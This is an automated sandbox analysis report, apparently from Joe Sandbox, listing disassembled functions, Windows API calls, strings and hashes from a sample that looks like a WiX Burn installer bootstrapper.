                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ErrorHandleInitLastModuleVariant
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 52713655-0
                                                                                                                                                              • Opcode ID: 28a2cdab8f377fdae7e573e77c92a29d9ad535cf6387f1160ff9c98b6cc96e80
                                                                                                                                                              • Instruction ID: 77bd64cae66fa1dc8ec1afce9b41ad1ae1030fc9e9cc9f4701cee6649311fde5
                                                                                                                                                              • Opcode Fuzzy Hash: 28a2cdab8f377fdae7e573e77c92a29d9ad535cf6387f1160ff9c98b6cc96e80
                                                                                                                                                              • Instruction Fuzzy Hash: 11313C76E01629ABCB51DFA8C884ADEB7F8FF08710F01456AE915EB351D6359D008BA0
                                                                                                                                                              Function 00805870 Relevance: 1.6, APIs: 1, Instructions: 60registryCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • RegCloseKey.ADVAPI32(80070490,00000000,80070490,0082AAA0,00000000,80070490,?,?,007D8B19,WiX\Burn,PackageCache,00000000,0082AAA0,00000000,00000000,80070490), ref: 008058CA
                                                                                                                                                                • Part of subcall function 008010B5: RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000001,00000000,00000000,00000000,00000000,00000000), ref: 0080112B
                                                                                                                                                                • Part of subcall function 008010B5: RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,?), ref: 00801163
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: QueryValue$Close
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1979452859-0
                                                                                                                                                              • Opcode ID: 6f0c5c63b527afc0c944248dc60cbea61656dcdfa531b13de65b8c60ad0a85bd
                                                                                                                                                              • Instruction ID: 06a33719688be77882e12b2e0d7193f5129314fa53c6540021e0a04e696fe4a3
                                                                                                                                                              • Opcode Fuzzy Hash: 6f0c5c63b527afc0c944248dc60cbea61656dcdfa531b13de65b8c60ad0a85bd
                                                                                                                                                              • Instruction Fuzzy Hash: BC11703680062EEFDB61AE98CD859AFBB69FF04320B258179ED41A7251C7314E50DFE1
                                                                                                                                                              Function 007C34B5 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • SHGetFolderPathW.SHELL32(00000000,00000000,00000000,00000000,00000000,00000000,00000104,00000000,?,007D8BD3,0000001C,80070490,00000000,00000000,80070490), ref: 007C34D5
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: FolderPath
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1514166925-0
                                                                                                                                                              • Opcode ID: 532e58534940c2a6a0f0592dbda59e639c5ffcff59eb74ed3f2f7e0790bd8c81
                                                                                                                                                              • Instruction ID: 7cc1ba7f02961ca069deba5f092ed39ce9f480e16a372ed445fe9bdfef18733f
                                                                                                                                                              • Opcode Fuzzy Hash: 532e58534940c2a6a0f0592dbda59e639c5ffcff59eb74ed3f2f7e0790bd8c81
                                                                                                                                                              • Instruction Fuzzy Hash: 58E012B22012247BE6422E615C09EBB7B9CAF05364700806DFE40D6111E76AEA5097B0
                                                                                                                                                              Function 00802EFE Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • FreeLibrary.KERNELBASE(00000000,00000000,007C556E,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00802F0B
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: FreeLibrary
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3664257935-0
                                                                                                                                                              • Opcode ID: df9303550cff90d29869dc2b1a513c76c680a0ebad26b43e3adb1e21c6273353
                                                                                                                                                              • Instruction ID: 5edacaaba72335ec2b126504bcfcf4fcd352bc88f99a4a520b9d080c3df2fd87
                                                                                                                                                              • Opcode Fuzzy Hash: df9303550cff90d29869dc2b1a513c76c680a0ebad26b43e3adb1e21c6273353
                                                                                                                                                              • Instruction Fuzzy Hash: 0CE0F6F1927625DECB608F69BD444427BB8FB28B40304820BB804D2220C7B054438FE0
                                                                                                                                                              Function 00809684 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0080966B
                                                                                                                                                                • Part of subcall function 0080998C: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00809A09
                                                                                                                                                                • Part of subcall function 0080998C: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00809A1A
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1269201914-0
                                                                                                                                                              • Opcode ID: a4d083620c5b915b127558c4716360b93f3530475d9518ce4f7bfa18e78c72b0
                                                                                                                                                              • Instruction ID: 158681e47677f102a7e194a6afcedba07431c1a2b727fde6197a4f13f8b373fc
                                                                                                                                                              • Opcode Fuzzy Hash: a4d083620c5b915b127558c4716360b93f3530475d9518ce4f7bfa18e78c72b0
                                                                                                                                                              • Instruction Fuzzy Hash: 1BB01291269211EDBECC51893E43C37090CFEC1F11731811EF0A1D12D2E8850CC50133
                                                                                                                                                              Function 00809653 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0080966B
                                                                                                                                                                • Part of subcall function 0080998C: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00809A09
                                                                                                                                                                • Part of subcall function 0080998C: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00809A1A
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1269201914-0
                                                                                                                                                              • Opcode ID: fa7b05602f6c1dfa1b9b4c7977264ba016023f4dbab10d89cc8f3c6b785135fa
                                                                                                                                                              • Instruction ID: d3170246bf15e8d1825ea2421c3521073799ee2775efe5b17612442bc550a3f1
                                                                                                                                                              • Opcode Fuzzy Hash: fa7b05602f6c1dfa1b9b4c7977264ba016023f4dbab10d89cc8f3c6b785135fa
                                                                                                                                                              • Instruction Fuzzy Hash: CDB01291269115FDBE8C11457C82C37090CFEC0F11731C11EF0A1E01D2A8800CC40233
                                                                                                                                                              Function 00809674 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0080966B
                                                                                                                                                                • Part of subcall function 0080998C: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00809A09
                                                                                                                                                                • Part of subcall function 0080998C: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00809A1A
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1269201914-0
                                                                                                                                                              • Opcode ID: cff6473c8a5ad4f7bb132b8bf0fb8a05e974c217531cb07633afb1a2f62bc229
                                                                                                                                                              • Instruction ID: 02183c69dc6ffb48d6818a550efda812152e461c06d2d91fe30615f97591864b
                                                                                                                                                              • Opcode Fuzzy Hash: cff6473c8a5ad4f7bb132b8bf0fb8a05e974c217531cb07633afb1a2f62bc229
                                                                                                                                                              • Instruction Fuzzy Hash: 97B01291269012EDBACC51493C03C370A0CFAC0B11331C11EF4A1C12D2E8810CC84133
                                                                                                                                                              Function 007C14B6 Relevance: 1.3, APIs: 1, Instructions: 57stringCOMMONLIBRARYCODE
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • lstrlenW.KERNEL32(00000000,00000000,00000000,?,?,007C21A8,?,00000000,?,00000000,?,007C390C,00000000,?,00000104), ref: 007C14E8
                                                                                                                                                                • Part of subcall function 007C3BD3: GetProcessHeap.KERNEL32(00000000,000001C7,?,007C21CC,000001C7,80004005,8007139F,?,?,00800267,8007139F,?,00000000,00000000,8007139F), ref: 007C3BDB
                                                                                                                                                                • Part of subcall function 007C3BD3: HeapSize.KERNEL32(00000000,?,007C21CC,000001C7,80004005,8007139F,?,?,00800267,8007139F,?,00000000,00000000,8007139F), ref: 007C3BE2
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Heap$ProcessSizelstrlen
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3492610842-0
                                                                                                                                                              • Opcode ID: 692cebbbb50460d331de5034f0f0f5c0d5e186ac4ca3ef423c2bf348492ac41e
                                                                                                                                                              • Instruction ID: e59bbf8bea544233ae234e04377cc79a6150662c0d3441e89646b3a78d495bb4
                                                                                                                                                              • Opcode Fuzzy Hash: 692cebbbb50460d331de5034f0f0f5c0d5e186ac4ca3ef423c2bf348492ac41e
                                                                                                                                                              • Instruction Fuzzy Hash: 4301F933200218EBCF115E54EC84F9A7765AF86760FA1823DFA165B253D639DD108690

                                                                                                                                                              Non-executed Functions

                                                                                                                                                              Function 007CA8F1 Relevance: 173.9, APIs: 29, Strings: 70, Instructions: 688COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • SysFreeString.OLEAUT32(?), ref: 007CB11C
                                                                                                                                                                • Part of subcall function 007C394F: GetProcessHeap.KERNEL32(?,000001C7,?,007C2274,000001C7,00000001,80004005,8007139F,?,?,00800267,8007139F,?,00000000,00000000,8007139F), ref: 007C3960
                                                                                                                                                                • Part of subcall function 007C394F: RtlAllocateHeap.NTDLL(00000000,?,007C2274,000001C7,00000001,80004005,8007139F,?,?,00800267,8007139F,?,00000000,00000000,8007139F), ref: 007C3967
                                                                                                                                                              • CompareStringW.KERNEL32(0000007F,00000000,0080CA9C,000000FF,DirectorySearch,000000FF,0080CA9C,Condition,feclient.dll,0080CA9C,Variable,?,0080CA9C,0080CA9C,?,?), ref: 007CAA29
                                                                                                                                                              • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,exists,000000FF,?,Type,?,?,Path,clbcatq.dll), ref: 007CAA7E
                                                                                                                                                              • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,path,000000FF), ref: 007CAA9A
                                                                                                                                                              • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,FileSearch,000000FF), ref: 007CAABE
                                                                                                                                                              • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,exists,000000FF,?,Type,?,?,Path,clbcatq.dll), ref: 007CAB11
                                                                                                                                                              • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,version,000000FF), ref: 007CAB2B
                                                                                                                                                              • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,RegistrySearch,000000FF), ref: 007CAB53
                                                                                                                                                              • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,HKCR,000000FF,?,Root,?), ref: 007CAB91
                                                                                                                                                              • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,HKCU,000000FF), ref: 007CABB0
                                                                                                                                                              • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,HKLM,000000FF), ref: 007CABCF
                                                                                                                                                              • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,exists,000000FF,?,Win64,msi.dll,?,Type,?,?,Value,version.dll,?), ref: 007CAC8D
                                                                                                                                                              • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,value,000000FF), ref: 007CACA7
                                                                                                                                                                • Part of subcall function 008032F3: VariantInit.OLEAUT32(?), ref: 00803309
                                                                                                                                                                • Part of subcall function 008032F3: SysAllocString.OLEAUT32(?), ref: 00803325
                                                                                                                                                                • Part of subcall function 008032F3: VariantClear.OLEAUT32(?), ref: 008033AC
                                                                                                                                                                • Part of subcall function 008032F3: SysFreeString.OLEAUT32(00000000), ref: 008033B7
                                                                                                                                                              • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,numeric,000000FF,?,VariableType,?,?,ExpandEnvironment,cabinet.dll), ref: 007CAD06
                                                                                                                                                              • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,string,000000FF), ref: 007CAD28
                                                                                                                                                              • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,version,000000FF), ref: 007CAD48
                                                                                                                                                              • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,directory,000000FF), ref: 007CAE20
                                                                                                                                                              • SysFreeString.OLEAUT32(?), ref: 007CAFFE
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: String$Compare$Free$HeapVariant$AllocAllocateClearInitProcess
                                                                                                                                                              • String ID: ComponentId$Condition$DirectorySearch$DirectorySearch|FileSearch|RegistrySearch|MsiComponentSearch|MsiProductSearch|MsiFeatureSearch$ET|$ExpandEnvironment$Failed to allocate memory for search structs.$Failed to get @ComponentId.$Failed to get @Condition.$Failed to get @ExpandEnvironment.$Failed to get @FeatureId.$Failed to get @Id.$Failed to get @Path.$Failed to get @ProductCode or @UpgradeCode.$Failed to get @ProductCode.$Failed to get @Root.$Failed to get @Type.$Failed to get @UpgradeCode.$Failed to get @Variable.$Failed to get @VariableType.$Failed to get Key attribute.$Failed to get Value attribute.$Failed to get Win64 attribute.$Failed to get next node.$Failed to get search node count.$Failed to select search nodes.$FeatureId$FileSearch$HKCR$HKCU$HKLM$HKU$Invalid value for @Root: %ls$Invalid value for @Type: %ls$Invalid value for @VariableType: %ls$Key$MsiComponentSearch$MsiFeatureSearch$MsiProductSearch$Path$ProductCode$RegistrySearch$Root$Type$Unexpected element name: %ls$UpgradeCode$Value$Variable$VariableType$Win64$`<u$assignment$cabinet.dll$clbcatq.dll$comres.dll$directory$exists$feclient.dll$keyPath$language$msi.dll$numeric$path$search.cpp$state$string$value$version$version.dll$wininet.dll
                                                                                                                                                              • API String ID: 2748437055-1919346173
                                                                                                                                                              • Opcode ID: a35acc6e099f6eb6648314fcc92a0a2180f9aeea4b8c901e0539eabc52600bbd
                                                                                                                                                              • Instruction ID: 7468613f58d2fa344c2f5c07e2006b551748931e803f90744414b78ebd870015
                                                                                                                                                              • Opcode Fuzzy Hash: a35acc6e099f6eb6648314fcc92a0a2180f9aeea4b8c901e0539eabc52600bbd
                                                                                                                                                              • Instruction Fuzzy Hash: 59229371E4822ABADB619A948C47F6F7B68FB01734F20475CB930F62D0D778AE40D691
                                                                                                                                                              Function 007E41EA Relevance: 43.0, Strings: 34, Instructions: 498COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              • Failed to add obfuscated properties to argument string., xrefs: 007E4497
                                                                                                                                                              • WixBundleExecutePackageAction, xrefs: 007E43B7, 007E48B4
                                                                                                                                                              • Failed to add reinstall all property on minor upgrade., xrefs: 007E45EA
                                                                                                                                                              • %ls %ls=ALL, xrefs: 007E46B6, 007E4795
                                                                                                                                                              • REBOOT=ReallySuppress, xrefs: 007E45A0, 007E476C
                                                                                                                                                              • Failed to add reinstall mode and reboot suppression properties on minor upgrade., xrefs: 007E460C
                                                                                                                                                              • Failed to add feature action properties to argument string., xrefs: 007E44B9
                                                                                                                                                              • REINSTALLMODE="vomus" REBOOT=ReallySuppress, xrefs: 007E45F5
                                                                                                                                                              • Failed to uninstall MSI package., xrefs: 007E47EF
                                                                                                                                                              • msasn1.dll, xrefs: 007E440B
                                                                                                                                                              • Failed to add patch properties to argument string., xrefs: 007E44FD
                                                                                                                                                              • Failed to build MSI path., xrefs: 007E439D
                                                                                                                                                              • Failed to initialize external UI handler., xrefs: 007E43F4
                                                                                                                                                              • Failed to add reinstall mode and reboot suppression properties on repair., xrefs: 007E469B
                                                                                                                                                              • VersionString, xrefs: 007E428E, 007E42EF
                                                                                                                                                              • Failed to add patch properties to obfuscated argument string., xrefs: 007E451F
                                                                                                                                                              • Failed to add the list of dependencies to ignore to the properties., xrefs: 007E46CA
                                                                                                                                                              • Failed to add reboot suppression property on uninstall., xrefs: 007E477D
                                                                                                                                                              • Failed to install MSI package., xrefs: 007E4746
                                                                                                                                                              • %ls%ls REINSTALLMODE="cmus%ls" REBOOT=ReallySuppress, xrefs: 007E4687
                                                                                                                                                              • Failed to perform minor upgrade of MSI package., xrefs: 007E4638
                                                                                                                                                              • feclient.dll, xrefs: 007E42C5, 007E434D, 007E441D, 007E454B, 007E47D8
                                                                                                                                                              • Failed to add ADMIN property on admin install., xrefs: 007E471E
                                                                                                                                                              • REINSTALL=ALL, xrefs: 007E45D3, 007E464D
                                                                                                                                                              • ACTION=ADMIN, xrefs: 007E4709
                                                                                                                                                              • crypt32.dll, xrefs: 007E440A
                                                                                                                                                              • IGNOREDEPENDENCIES, xrefs: 007E46A5, 007E4784
                                                                                                                                                              • Failed to enable logging for package: %ls to: %ls, xrefs: 007E441F
                                                                                                                                                              • Failed to add reboot suppression property on install., xrefs: 007E45BB
                                                                                                                                                              • Failed to get cached path for package: %ls, xrefs: 007E434F
                                                                                                                                                              • WixBundleExecutePackageCacheFolder, xrefs: 007E436A, 007E48A4
                                                                                                                                                              • Failed to add feature action properties to obfuscated argument string., xrefs: 007E44DB
                                                                                                                                                              • Failed to run maintanance mode for MSI package., xrefs: 007E46F6
                                                                                                                                                              • Failed to add properties to argument string., xrefs: 007E4463
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: ACTION=ADMIN$ REBOOT=ReallySuppress$ REINSTALL=ALL$ REINSTALLMODE="vomus" REBOOT=ReallySuppress$%ls %ls=ALL$%ls%ls REINSTALLMODE="cmus%ls" REBOOT=ReallySuppress$Failed to add ADMIN property on admin install.$Failed to add feature action properties to argument string.$Failed to add feature action properties to obfuscated argument string.$Failed to add obfuscated properties to argument string.$Failed to add patch properties to argument string.$Failed to add patch properties to obfuscated argument string.$Failed to add properties to argument string.$Failed to add reboot suppression property on install.$Failed to add reboot suppression property on uninstall.$Failed to add reinstall all property on minor upgrade.$Failed to add reinstall mode and reboot suppression properties on minor upgrade.$Failed to add reinstall mode and reboot suppression properties on repair.$Failed to add the list of dependencies to ignore to the properties.$Failed to build MSI path.$Failed to enable logging for package: %ls to: %ls$Failed to get cached path for package: %ls$Failed to initialize external UI handler.$Failed to install MSI package.$Failed to perform minor upgrade of MSI package.$Failed to run maintanance mode for MSI package.$Failed to uninstall MSI package.$IGNOREDEPENDENCIES$VersionString$WixBundleExecutePackageAction$WixBundleExecutePackageCacheFolder$crypt32.dll$feclient.dll$msasn1.dll
                                                                                                                                                              • API String ID: 0-2033600224
                                                                                                                                                              • Opcode ID: 5ccb21101941ffc4824cbf8f28f13a248a6e5fb7896ec8e75c50d808fa2117e7
                                                                                                                                                              • Instruction ID: e0b52c3a3e50d017dad91d99ea958ba3e7031517d33471cd3e3c3ef1ed547e98
                                                                                                                                                              • Opcode Fuzzy Hash: 5ccb21101941ffc4824cbf8f28f13a248a6e5fb7896ec8e75c50d808fa2117e7
                                                                                                                                                              • Instruction Fuzzy Hash: 6602E171942665AFCB219F55CC85FA9B7BAFF58310F0001A5F918E7251C73AAEA0DF80
                                                                                                                                                              Function 00801719 Relevance: 38.8, APIs: 21, Strings: 1, Instructions: 337COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • InitializeSecurityDescriptor.ADVAPI32(?,00000001), ref: 008017B1
                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 008017BB
                                                                                                                                                              • CreateWellKnownSid.ADVAPI32(0000001A,00000000,?,?), ref: 00801808
                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0080180E
                                                                                                                                                              • CreateWellKnownSid.ADVAPI32(00000017,00000000,?,?), ref: 00801848
                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0080184E
                                                                                                                                                              • CreateWellKnownSid.ADVAPI32(00000018,00000000,?,?), ref: 0080188E
                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00801894
                                                                                                                                                              • CreateWellKnownSid.ADVAPI32(00000010,00000000,?,?), ref: 008018D4
                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 008018DA
                                                                                                                                                              • CreateWellKnownSid.ADVAPI32(00000016,00000000,?,?), ref: 0080191A
                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00801920
                                                                                                                                                              • SetEntriesInAclA.ADVAPI32(00000005,?,00000000,?), ref: 00801A11
                                                                                                                                                              • SetSecurityDescriptorOwner.ADVAPI32(?,?,00000000), ref: 00801A4B
                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00801A55
                                                                                                                                                              • SetSecurityDescriptorGroup.ADVAPI32(?,?,00000000), ref: 00801A8D
                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00801A97
                                                                                                                                                              • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00801AD0
                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00801ADA
                                                                                                                                                              • CoInitializeSecurity.OLE32(?,000000FF,00000000,00000000,00000006,00000002,00000000,00003000,00000000), ref: 00801B18
                                                                                                                                                              • LocalFree.KERNEL32(?), ref: 00801B2E
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
